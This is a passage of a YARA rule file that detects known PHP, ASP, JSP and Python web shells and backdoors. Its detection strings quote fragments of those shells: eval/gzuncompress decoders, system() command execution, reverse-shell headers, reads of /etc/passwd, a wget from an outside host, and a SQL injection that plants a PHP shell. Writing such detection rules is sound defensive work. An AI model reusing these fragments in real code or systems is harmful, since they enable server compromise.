   		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"   
   		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"   
   	condition:   
   		2 of them   
rule webshell_dev_core {   
   	meta:   
   		description = "Web shells - generated from file dev_core.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "55ad9309b006884f660c41e53150fc2e"   
   	strings:   
   		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword   
   		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword   
   		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"   
   		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"   
   		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"   
   		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"   
   	condition:   
   		1 of them   
rule Phyton_Shell_py {   
   	meta:   
   		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "92b3c897090867c65cc169ab037a0f55"   
   	strings:   
   		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword   
   		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword   
   		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword   
   		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword   
   	condition:   
   		1 of them   
rule webshell_php_up : webshell {   
   	meta:   
   		description = "Web Shell - file up.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "7edefb8bd0876c41906f4b39b52cd0ef"   
   	strings:   
   		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword   
   		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword   
   		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword   
   	condition:   
   		2 of them   
rule cgi_python_py {   
   	meta:   
   		description = "Semi-Auto-generated  - file cgi-python.py.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "0a15f473e2232b89dae1075e1afdac97"   
   	strings:   
   		$s0 = "a CGI by Fuzzyman"   
   		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "   
   		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"   
   	condition:   
   		1 of them   
rule webshell_Expdoor_com_ASP {   
   	meta:   
   		description = "Web shells - generated from file Expdoor.com ASP.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "caef01bb8906d909f24d1fa109ea18a7"   
   	strings:   
   		$s4 = "\">www.Expdoor.com</a>" fullword   
   		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"   
   		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword   
   		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword   
   		$s16 = "<TITLE>Expdoor.com ASP" fullword   
   	condition:   
   		2 of them   
rule WebShell_php_webshells_myshell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file myshell.php"   
   		author = "Florian Roth"   
   		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"   
   	strings:   
   		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"   
   		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"   
   		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword   
   		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"   
   	condition:   
   		1 of them   
rule webshell_807_dm_JspSpyJDK5_m_cofigrue {   
   	meta:   
   		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"   
   		hash1 = "14e9688c86b454ed48171a9d4f48ace8"   
   		hash2 = "341298482cf90febebb8616426080d1d"   
   		hash3 = "88fc87e7c58249a398efd5ceae636073"   
   		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"   
   	strings:   
   		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword   
   		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword   
   	condition:   
   		1 of them   
rule WebShell_NCC_Shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file NCC-Shell.php"   
   		author = "Florian Roth"   
   		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"   
   	strings:   
   		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword   
   		$s1 = "<b>--Coded by Silver" fullword   
   		$s2 = "<title>Upload - Shell/Datei</title>" fullword   
   		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"   
   		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword   
   		$s18 = "printf(\"Sie ist %u Bytes gro" fullword   
   	condition:   
   		3 of them   
rule webshell_ASP_zehir {   
   	meta:   
   		description = "Web Shell - file zehir.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "0061d800aee63ccaf41d2d62ec15985d"   
   	strings:   
   		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"   
   	condition:   
   		all of them   
rule telnet_cgi {   
   	meta:   
   		description = "Semi-Auto-generated  - file telnet.cgi.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "dee697481383052980c20c48de1598d1"   
   	strings:   
   		$s0 = "www.rohitab.com"   
   		$s1 = "W A R N I N G: Private Server"   
   		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"   
   		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"   
   	condition:   
   		1 of them   
rule ZXshell2_0_rar_Folder_zxrecv {   
   	meta:   
   		description = "Webshells Auto-generated - file zxrecv.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"   
   	strings:   
   		$s0 = "RyFlushBuff"   
   		$s1 = "teToWideChar^FiYP"   
   		$s2 = "mdesc+8F D"   
   		$s3 = "\\von76std"   
   		$s4 = "5pur+virtul"   
   		$s5 = "- Kablto io"   
   		$s6 = "ac#f{lowi8a"   
   	condition:   
   		all of them   
rule Webshell_27_9_c66_c99 {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"   
   		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"   
   		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"   
   		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"   
   		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"   
   		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"   
   		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"   
   		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"   
   		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"   
   		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"   
   	strings:   
   		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii   
   		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii   
   		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii   
   	condition:   
   		filesize < 685KB and 1 of them   
rule webshell_NetworkFileManagerPHP {   
   	meta:   
   		description = "Web Shell - file NetworkFileManagerPHP.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"   
   	strings:   
   		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "   
   	condition:   
   		all of them   
rule php_killnc : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file killnc.php"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"   
   	strings:   
   		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii   
   		$s3 = "<?php echo exec('killall nc');?>" fullword ascii /* PEStudio Blacklist: strings */   
   		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii /* PEStudio Blacklist: strings */   
   		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii   
   	condition:   
   		filesize < 15KB and 4 of them   
rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"   
   		author = "Florian Roth"   
   		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"   
   	strings:   
   		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword   
   		$s11 = "directory... Trust me - it works :-) */" fullword   
   		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword   
   		$s16 = "} else if ($command == 'ls') {" fullword   
   	condition:   
   		3 of them   
rule hkshell_hkshell {   
   	meta:   
   		description = "Webshells Auto-generated - file hkshell.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "168cab58cee59dc4706b3be988312580"   
   	strings:   
   		$s1 = "PrSessKERNELU"   
   		$s2 = "Cur3ntV7sion"   
   		$s3 = "Explorer8"   
   	condition:   
   		all of them   
rule webshell_jsp_hsxa {   
   	meta:   
   		description = "Web Shell - file hsxa.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"   
   	strings:   
   		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"   
   	condition:   
   		all of them   
rule WebShell_DTool_Pro {   
   	meta:   
   		description = "PHP Webshells Github Archive - file DTool Pro.php"   
   		author = "Florian Roth"   
   		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"   
   	strings:   
   		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"   
   		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword   
   		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"   
   		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword   
   		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword   
   		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword   
   		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "   
   		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword   
   	condition:   
   		3 of them   
rule FSO_s_casus15 {   
   	meta:   
   		description = "Webshells Auto-generated - file casus15.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8d155b4239d922367af5d0a1b89533a3"   
   	strings:   
   		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"   
   	condition:   
   		all of them   
rule WebShell_indexer_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"   
   		author = "Florian Roth"   
   		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"   
   	strings:   
   		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword   
   		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword   
   		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword   
   		$s4 = "<form action=\"?oku\" method=\"post\">" fullword   
   		$s7 = "var message=\"SaNaLTeRoR - " fullword   
   		$s8 = "nDexEr - Reader\"" fullword   
   	condition:   
   		3 of them   
rule iMHaPFtp {   
   	meta:   
   		description = "Webshells Auto-generated - file iMHaPFtp.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "12911b73bc6a5d313b494102abcf5c57"   
   	strings:   
   		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"   
   	condition:   
   		all of them   
rule webshell_php_h6ss {   
   	meta:   
   		description = "Web Shell - file h6ss.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "272dde9a4a7265d6c139287560328cd5"   
   	strings:   
   		$s0 = "<?php eval(gzuncompress(base64_decode(\""   
   	condition:   
   		all of them   
rule webshell_PHP_co {   
   	meta:   
   		description = "Web Shell - file co.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "62199f5ac721a0cb9b28f465a513874c"   
   	strings:   
   		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword   
   		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword   
   	condition:   
   		all of them   
rule hxdef100_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file hxdef100.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"   
   	strings:   
   		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"   
   		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"   
   		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"   
   	condition:   
   		all of them   
rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"   
   		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"   
   		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"   
   	strings:   
   		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword   
   		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword   
   		$s3 = "$dt = $_POST['filecontent'];" fullword   
   		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword   
   		$s6 = "print \"Sorry, none of the command functions works.\";" fullword   
   		$s11 = "document.cmdform.command.value='';" fullword   
   		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"   
   	condition:   
   		3 of them   
rule WebShell_toolaspshell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file toolaspshell.php"   
   		author = "Florian Roth"   
   		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"   
   	strings:   
   		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"   
   		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword   
   		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword   
   	condition:   
   		2 of them   
rule webshell_spjspshell {   
   	meta:   
   		description = "Web Shell - file spjspshell.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d39d51154aaad4ba89947c459a729971"   
   	strings:   
   		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"   
   	condition:   
   		all of them   
rule Webshell_c100 {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files c100 v. 777shell"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"   
   		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"   
   		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"   
   		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"   
   		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"   
   		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"   
   		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"   
   	strings:   
   		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii   
   		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii   
   		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii   
   		$s4 = "which wget curl w3m lynx" ascii   
   		$s6 = "netstat -atup | grep IST"  ascii   
   	condition:   
   		filesize < 685KB and 2 of them   
rule backdoorfr_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file backdoorfr.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "91e4afc7444ed258640e85bcaf0fecfc"   
   	strings:   
   		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"   
   		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"   
   	condition:   
   		1 of them   
rule multiple_webshells_0025 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_c99shell_v1_0_php_php_c99php_SsEs_php_php"   
   		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"   
   	strings:   
   		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword   
   	condition:   
   		1 of them   
rule mysql_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file mysql.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "12bbdf6ef403720442a47a3cc730d034"   
   	strings:   
   		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"   
   		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"   
   		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "   
   	condition:   
   		1 of them   
rule xssshell {   
   	meta:   
   		description = "Webshells Auto-generated - file xssshell.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"   
   	strings:   
   		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_pHpINJ {   
   	meta:   
   		description = "PHP Webshells Github Archive - file pHpINJ.php"   
   		author = "Florian Roth"   
   		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"   
   	strings:   
   		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword   
   		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword   
   		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"   
   		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword   
   		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword   
   		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword   
   		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword   
   	condition:   
   		1 of them   
rule multiple_webshells_0020 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   	strings:   
   		$s0 = "@ini_set(\"highlight" fullword   
   		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword   
   		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword   
   	condition:   
   		2 of them   
rule WebShell_aZRaiLPhp_v1_0 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"   
   		author = "Florian Roth"   
   		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"   
   	strings:   
   		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"   
   		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword   
   		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword   
   		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword   
   	condition:   
   		2 of them   
rule WebShell_ZyklonShell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file ZyklonShell.php"   
   		author = "Florian Roth"   
   		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"   
   	strings:   
   		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword   
   		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword   
   		$s2 = "<TITLE>404 Not Found</TITLE>" fullword   
   		$s3 = "<H1>Not Found</H1>" fullword   
   	condition:   
   		all of them   
rule aspydrv_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file aspydrv.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "1c01f8a88baee39aa1cebec644bbcb99"   
   		score = 60   
   	strings:   
   		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"   
   		$s1 = "password"   
   		$s2 = "session(\"shagman\")="   
   	condition:   
   		2 of them   
rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {   
   	meta:   
   		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "64a3bf9142b045b9062b204db39d4d57"   
   		hash1 = "9abd397c6498c41967b4dd327cf8b55a"   
   		hash2 = "56c005690da2558690c4aa305a31ad37"   
   		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"   
   		hash4 = "532b93e02cddfbb548ce5938fe2f5559"   
   		hash5 = "6e0fa491d620d4af4b67bae9162844ae"   
   		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"   
   	strings:   
   		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword   
   		$s6 = "password = (String)session.getAttribute(\"password\");" fullword   
   		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"   
   	condition:   
   		2 of them   
rule EFSO_2_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b5fde9682fd63415ae211d53c6bfaa4d"   
   	strings:   
   		$s0 = "Ejder was HERE"   
   		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"   
   	condition:   
   		2 of them   
rule webshell_B374kPHP_B374k {   
   	meta:   
   		description = "Web Shell - file B374k.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "bed7388976f8f1d90422e8795dff1ea6"   
   	strings:   
   		$s0 = "Http://code.google.com/p/b374k-shell" fullword   
   		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"   
   		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword   
   		$s4 = "B374k Vip In Beautify Just For Self" fullword   
   	condition:   
   		1 of them   
rule Dx_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Dx.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"   
   	strings:   
   		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"   
   		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"   
   		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"   
   	condition:   
   		1 of them   
rule webshell_jsp_hsxa1 {   
   	meta:   
   		description = "Web Shell - file hsxa1.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5686d5a38c6f5b8c55095af95c2b0244"   
   	strings:   
   		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"   
   	condition:   
   		all of them   
rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {   
   	meta:   
   		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "7066f4469c3ec20f4890535b5f299122"   
   		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"   
   		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"   
   		hash3 = "8979594423b68489024447474d113894"   
   		hash4 = "ec482fc969d182e5440521c913bab9bd"   
   		hash5 = "f98d2b33cd777e160d1489afed96de39"   
   		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"   
   		hash7 = "e9a5280f77537e23da2545306f6a19ad"   
   	strings:   
   		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"   
   		$s2 = " KB </td>" fullword   
   		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""   
   		$s4 = "<!-- <tr align=\"center\"> " fullword   
   	condition:   
   		all of them   
rule webshell_ELMALISEKER_Backd00r {   
   	meta:   
   		description = "Web Shell - file ELMALISEKER Backd00r.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"   
   	strings:   
   		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"   
   		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"   
   	condition:   
   		all of them   
rule multiple_webshells_0010 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_wacking_php_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash2 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"   
   		$s2 = "c99sh_sqlquery"   
   	condition:   
